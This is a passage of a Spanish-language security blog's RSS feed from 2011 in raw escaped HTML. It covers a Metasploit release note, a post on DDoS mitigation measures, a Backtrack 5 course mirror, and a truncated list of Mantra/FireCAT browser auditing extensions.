&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;For more details about this release, see the &lt;/span&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="https://dev.metasploit.com/redmine/projects/framework/wiki/Release_Notes_372"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;3.7.2 Release Notes&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5967737507322085400-1324356583073016521?l=pramirezh.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pramirezh.blogspot.com/2011/06/release-metasploit-framework-372.html</link><author>noreply@blogger.com (Pablo Ramirez Hoffmann)</author></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5967737507322085400.post-5421481998377639915</guid><pubDate>Tue, 21 Jun 2011 16:59:00 +0000</pubDate><atom:updated>2011-06-21T12:59:33.080-04:00</atom:updated><title>Mitigación de un DDoS</title><description>&lt;div class="mobile-photo"&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin-bottom: 12.0pt;"&gt;&lt;b&gt;&lt;span style="color: black; font-size: 10.0pt;"&gt;En algún momento les comenté sobre los ataques de denegación de servicios, cuáles eran sus variantes y algunas herramientas utilizadas por los atacantes, hoy les traigo algunos ejemplos de mitigación. Espero sean de su interés.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin-bottom: 12.0pt;"&gt;&lt;b&gt;&lt;span style="color: black; font-size: 10.0pt;"&gt;Los ataques de &lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span style="font-size: 10.0pt;"&gt;Denegación de Servicio&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 10.0pt;"&gt; &lt;b&gt;&lt;span style="color: black;"&gt;(&lt;i&gt;Denial of Service&lt;/i&gt;, DoS) son casi tan antiguos como las redes de comunicaciones, pero de un tiempo a esta parte se han popularizado entre las bandadas de &lt;i&gt;script kiddies&lt;/i&gt;, para atacar a todo lo que no les gusta. &lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: black;"&gt;Ya sean partidos políticos, webs de ministerios e instituciones del estado, empresas privadas, etc. Nadie está a salvo de la ira vengadora de estos hacktivistas que últimamente están apareciendo en los diferentes medios tecnológicos y diarios de renombre, es más como todo saben, ya le pasaron la cuenta a Hidroaysen y al ministerio de energía.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: black;"&gt;Primera observación: &lt;/span&gt;&lt;/span&gt;&lt;span class="MsoHyperlink"&gt;&lt;a href="http://www.pajareo.com/8537-los-ataques-ddos-son-delito-con-el-nuevo-codigo-penal/" target="_blank"&gt;&lt;span style="font-size: 10.0pt;"&gt;es delito en España desde diciembre del 2010&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span style="font-size: 10.0pt;"&gt; (&lt;b&gt;CUANDO SERÁ EN CHILE&lt;/b&gt;)&lt;span style="color: black;"&gt; participar en este tipo de ataques. Se lee en Twitter, a algunos, que argumentan que los atacantes &lt;i&gt;sólo se ponen de acuerdo para visitar una página web&lt;/i&gt;. Llamar al 133 no es delito, por supuesto. Ponerte de acuerdo con 1000 colegas para que cada uno haga mil llamadas al 133 a una hora concreta puede poner vidas en peligro si nadie puede avisar a los señores carabineros de un delito.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin-bottom: 12.0pt;"&gt;&lt;span style="color: black; font-size: 10.0pt;"&gt;Este es el esquema de ataque desde una vista global.&lt;/span&gt;&lt;span style="font-size: 10.0pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-VbQeJ6tVgfg/TgDN1QqnhSI/AAAAAAAAAG8/ZDBqPPmBPjo/s1600/DoS.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="244" src="http://2.bp.blogspot.com/-VbQeJ6tVgfg/TgDN1QqnhSI/AAAAAAAAAG8/ZDBqPPmBPjo/s400/DoS.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;span style="color: black; font-size: 10.0pt;"&gt;Pero dejando el tema ético-legales a un lado, ¿qué se puede hacer para defenderse de ataques DoS? No es fácil y no hay soluciones mágicas, pero hay cosas que se pueden hacer:&lt;/span&gt;&lt;span style="font-size: 10.0pt;"&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: black;"&gt;Estar preparado&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style="color: black;"&gt;Los ataques que consisten en miles de conexiones &lt;b&gt;válidas &lt;/b&gt;por segundo funcionan porque cada una de las conexiones supone una carga en nuestros servidores (mostrar la información de la página web, quizá haciendo consultas a una base de datos, etc.)&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: black;"&gt;Todo el mundo que tiene página web debería tener calculado el impacto en rendimiento de sus páginas, y tener siempre un website alternativo de bajo impacto para situaciones de sobrecarga. Por ejemplo, durante los ataques en Nueva York del 11-S, muchos medios de comunicación sufrieron un ataque DoS no intencionado, al tener a millones de personas por todo el mundo intentando enterarse de qué pasaba, lo mismo paso en Chile hace unos días atrás, cuando por las noticias informaban sobre las acreencias y que visitaran el sitio &lt;a href="http://www.clientebancario.cl/"&gt;www.clientebancario.cl&lt;/a&gt; . Algunos, como la &lt;/span&gt;&lt;a href="http://www.cnn.com/" target="_blank"&gt;CNN&lt;span style="color: black;"&gt; &lt;/span&gt;&lt;/a&gt;&lt;span style="color: black;"&gt;cambiaron su página normal por una de sólo texto, sin publicidad, ni elementos innecesarios, de forma que cada petición se pudiera procesar en menos tiempo y así poder atender más conexiones por segundo.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: black;"&gt;Esto se puede incluso automatizar, de forma que los servidores web cambien automáticamente a la versión light en cuanto detectan un aumento inesperado del nivel de peticiones.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: black;"&gt;Usar redes de distribución de contenido (CDN)&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style="color: black;"&gt;&lt;a href="http://en.wikipedia.org/wiki/Content_delivery_network"&gt;Los CDN son sistemas que permiten a las empresas distribuir su contenido &lt;b&gt;estático&lt;/b&gt;&lt;/a&gt; por servidores distribuidos por todo el mundo, como los proporcionados por la empresa &lt;/span&gt;&lt;span class="MsoHyperlink"&gt;&lt;a href="http://www.akamai.com/" target="_blank"&gt;Akamai&lt;/a&gt;&lt;/span&gt;&lt;span style="color: black;"&gt;.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: black;"&gt;Que te ayude tu proveedor de acceso a Internet&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style="color: black;"&gt;Si tienes un proveedor de acceso serio, siempre podrás pedir que te ayuden en caso de ataque. Como mínimo deberían ser capaces de reenviar el tráfico que está dirigido a tus sistemas, a una ruta inválida (&lt;/span&gt;&lt;span class="MsoHyperlink"&gt;&lt;a href="http://en.wikipedia.org/wiki/Null_route" target="_blank"&gt;null route&lt;/a&gt;&lt;/span&gt;&lt;span style="color: black;"&gt;) de forma temporal.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: black;"&gt;El problema de este sistema es que nadie podrá acceder desde fuera, ni los atacantes ni tus usuarios legítimos. Entre los participantes en el ataque, que normalmente no tienen conocimientos suficientes, se cree que el ataque ha tenido éxito, ya que la página web deja de estar accesible.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: black;"&gt;Esto viene a ser la estrategia de hacerse el muerto, que puede ser muy válida en algunos casos, sobre todo combinada con contenido estático en CDN (ver punto anterior).&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: black;"&gt;Utilizar una solución anti-DDoS proporcionada por tu proveedor de acceso&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style="color: black;"&gt;Esto suele ser lo necesario cuando quieres evitar el ataque, pero quieres mantener tu sitio accesible por usuarios legítimos, y que el contenido no sea estático, sino transaccional. Es decir, seguir operando business as usual. Estas soluciones son complejas, y normalmente las ofrecen los proveedores de acceso a Internet a las grandes empresas, con un coste por supuesto.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: black;"&gt;Suelen consistir en:&lt;/span&gt;&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;ul type="disc"&gt;&lt;li class="MsoNormal" style="mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 36.0pt;"&gt;&lt;b&gt;&lt;span style="color: black; font-size: 10.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;Sistema de      detección y prevensión &lt;/span&gt;&lt;/b&gt;&lt;span style="color: black; font-size: 10.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;- elementos de red      (tipo &lt;/span&gt;&lt;span class="MsoHyperlink"&gt;&lt;span style="font-size: 10.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="http://www.tippingpoint.com/" target="_blank"&gt;TippingPoint&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color: black; font-size: 10.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;) que detectan la anomalía en el tráfico de red, herramientas      que utilizan los atacantes y exploit a sistemas web.&lt;/span&gt;&lt;span style="font-size: 10.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 36.0pt;"&gt;&lt;b&gt;&lt;span style="color: black; font-size: 10.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;Mecanismo de      redirección&lt;/span&gt;&lt;/b&gt;&lt;span style="color: black; font-size: 10.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;  puede ser iniciado por el ISP o por la      empresa atacada, y suele consistir en publicar una ruta nueva usando el &lt;/span&gt;&lt;span class="MsoHyperlink"&gt;&lt;span style="font-size: 10.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="http://en.wikipedia.org/wiki/Border_Gateway_Protocol" target="_blank"&gt;protocolo      de rutado BGP&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color: black; font-size: 10.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;, de forma que el tráfico a ciertas IPs se      redirija a través de un sistema de mitigación. &lt;/span&gt;&lt;span style="font-size: 10.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 36.0pt;"&gt;&lt;b&gt;&lt;span style="color: black; font-size: 10.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;Sistema de      mitigación &lt;/span&gt;&lt;/b&gt;&lt;span style="color: black; font-size: 10.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;- son elementos de red (tipo &lt;/span&gt;&lt;span class="MsoHyperlink"&gt;&lt;span style="font-size: 10.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="http://www.cisco.com/en/US/products/ps5888/index.html" target="_blank"&gt;Cisco Guard&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color: black; font-size: 10.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;), gestionados por      el ISP, que se comen todo el tráfico (suelen tener una capacidad enorme,      difícil de saturar por el ataque típico), y se encargan de separar el      grano de la paja mediante análisis estadístico, y reenvían a la empresa      atacada el tráfico limpio mediante un &lt;/span&gt;&lt;span class="MsoHyperlink"&gt;&lt;span style="font-size: 10.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="http://en.wikipedia.org/wiki/Generic_Routing_Encapsulation" target="_blank"&gt;túnel GRE&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color: black; font-size: 10.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt; cifrado. &lt;/span&gt;&lt;span style="font-size: 10.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;span style="color: black; font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;Si la disponibilidad y el libre acceso a nuestras aplicaciones y contenido son vitales, es imprescindible tener algún tipo de preparación contra ataques de denegación de servicio. Dependiendo de nuestras necesidades y/o presupuesto, podremos usar unas medidas u otras. Para un estudio estupendo sobre el estado de las cosas, lo mejor es el &lt;/span&gt;&lt;span class="MsoHyperlink"&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://www.arbornetworks.com/report" target="_blank"&gt;Network Infrastructure Security Report&lt;/a&gt; &lt;/span&gt;&lt;/span&gt;&lt;span style="color: black; font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;que publica Arbor Networks anualmente.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5967737507322085400-5421481998377639915?l=pramirezh.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pramirezh.blogspot.com/2011/06/mitigacion-de-un-ddos.html</link><author>noreply@blogger.com (Pablo Ramirez Hoffmann)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-VbQeJ6tVgfg/TgDN1QqnhSI/AAAAAAAAAG8/ZDBqPPmBPjo/s72-c/DoS.jpg" height="72" width="72" /></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5967737507322085400.post-8652962272539137445</guid><pubDate>Sat, 18 Jun 2011 03:57:00 +0000</pubDate><atom:updated>2011-06-17T23:57:57.560-04:00</atom:updated><title>Mirror de curso Backtrack 5</title><description>&lt;div class="mobile-photo"&gt;Desde omhe nos escriben:&lt;/div&gt;&lt;br /&gt;
Antes que nada para comunicar que el mirror oficial del curso es el siguiente:&lt;br /&gt;
&lt;a href="http://www.backtrack5.omhe.org/"&gt;http://www.backtrack5.omhe.org/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
En esa URL van a poder descargar todos los videos.&lt;br /&gt;
&lt;br /&gt;
Agradezco de una manera enorme a todas las distintas comunidades y grupos de hacking que han pasado la voz de los videos.&lt;br /&gt;
&lt;br /&gt;
Y avisarles que el curso total será de 20 clases. Aún estamos en la elaboración de la quinta y pronto vamos a liberar la cuarta.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5967737507322085400-8652962272539137445?l=pramirezh.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pramirezh.blogspot.com/2011/06/mirror-de-curso-backtrack-5.html</link><author>noreply@blogger.com (Pablo Ramirez Hoffmann)</author></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5967737507322085400.post-4794301202218333302</guid><pubDate>Fri, 17 Jun 2011 02:42:00 +0000</pubDate><atom:updated>2011-06-16T22:42:36.647-04:00</atom:updated><title>Mantra+FireCAT Browser-Pentester</title><description>&lt;div class="mobile-photo"&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;De DragonJAR obtengo esta noticia, que a mi punto de vista debiera ser el navegador de los desarrolladores o la gente de QA (QUE NUNCA HACE QA DE SEGURIDAD ;-))para aplicaciones web… espero sea de su interés.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;;"&gt;Mantra, el navegador pensado para auditorias de aplicaciones web y de &lt;a href="http://www.firecat.fr/"&gt;FireCAT&lt;/a&gt;, conjunto de extensiones de Firefox para Auditorias de Seguridad, les cuento que los desarrolladores de estas dos iniciativas han decidido unir esfuerzos y fusionar sus proyectos para generar el Navegador Definitivo e Auditorias de seguridad.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;;"&gt;La unión de estos dos proyectos, que parecía el paso a seguir, ya que FireCAT&amp;nbsp;ofrecía&amp;nbsp;un conjunto de&amp;nbsp;extensiones&amp;nbsp;muy bien organizadas sobre auditoria en seguridad y Mantra un navegador con estas extensiones ya integradas.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;;"&gt;Ahora Mantra ofrece una selecta&amp;nbsp;colección&amp;nbsp;de herramientas debidamente organizadas para convertir nuestro navegador en la caja de&amp;nbsp;herramientas&amp;nbsp;necesaria para realizar nuestras auditorias, como podemos ver en el siguiente listado:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;ul type="disc"&gt;&lt;li class="MsoNormal" style="mso-list: l4 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 36.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;Information Gathering&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;ul type="circle"&gt;&lt;li class="MsoNormal" style="mso-list: l4 level2 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 72.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;Whois&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;ul type="square"&gt;&lt;li class="MsoNormal" style="mso-list: l4 level3 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 108.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="https://addons.mozilla.org/es-es/firefox/addon/flagfox/"&gt;Flagfox&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;li class="MsoNormal" style="mso-list: l4 level2 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 72.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;Location Info&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;ul type="square"&gt;&lt;li class="MsoNormal" style="mso-list: l4 level3 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 108.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="https://addons.mozilla.org/es-es/firefox/addon/flagfox/"&gt;Flagfox&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;li class="MsoNormal" style="mso-list: l4 level2 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 72.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;Enumeration and       Fingerprint&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;ul type="square"&gt;&lt;li class="MsoNormal" style="mso-list: l4 level3 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 108.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="https://addons.mozilla.org/es-es/firefox/addon/host-spy"&gt;Host Spy&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l4 level3 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 108.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/jsview/"&gt;JSView&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l4 level3 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 108.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="https://addons.mozilla.org/en-us/firefox/addon/passiverecon/"&gt;PassiveRecon&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l4 level3 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 108.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/view-dependencies/"&gt;View        Dependencies&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l4 level3 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 108.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="https://addons.mozilla.org/es-ES/firefox/addon/wappalyzer/"&gt;Wappalyzer&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;li class="MsoNormal" style="mso-list: l4 level2 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 72.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;Data Mining&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;ul type="square"&gt;&lt;li class="MsoNormal" style="mso-list: l4 level3 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 108.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="https://addons.mozilla.org/es-es/firefox/addon/people-search-engine/"&gt;People        Search Engine&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l4 level3 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 108.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="https://addons.mozilla.org/es-es/firefox/addon/facebook-search-213947/"&gt;Facebook        search&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/ul&gt;&lt;li class="MsoNormal" style="mso-list: l4 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 36.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;Editors&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;ul type="circle"&gt;&lt;li class="MsoNormal" style="mso-list: l4 level2 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 72.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="https://addons.mozilla.org/en-us/firefox/addon/cert-viewer-plus/"&gt;Cert       Viewer Plus&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l4 level2 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 72.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/firebug/"&gt;Firebug&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l4 level2 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 72.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/jsview/"&gt;JSView&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/ul&gt;&lt;ul type="disc"&gt;&lt;li class="MsoNormal" style="mso-list: l1 level1 lfo2; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 36.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;Network Utilities&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;ul type="circle"&gt;&lt;li class="MsoNormal" style="mso-list: l1 level2 lfo2; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 72.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;Protocols and       applications&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;ul type="square"&gt;&lt;li class="MsoNormal" style="mso-list: l1 level3 lfo2; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 108.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;FTP&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;ul type="square"&gt;&lt;li class="MsoNormal" style="mso-list: l1 level4 lfo2; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 144.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="https://addons.mozilla.org/es-es/firefox/addon/fireftp/"&gt;Fire FTP&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;li class="MsoNormal" style="mso-list: l1 level3 lfo2; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 108.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;DNS&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
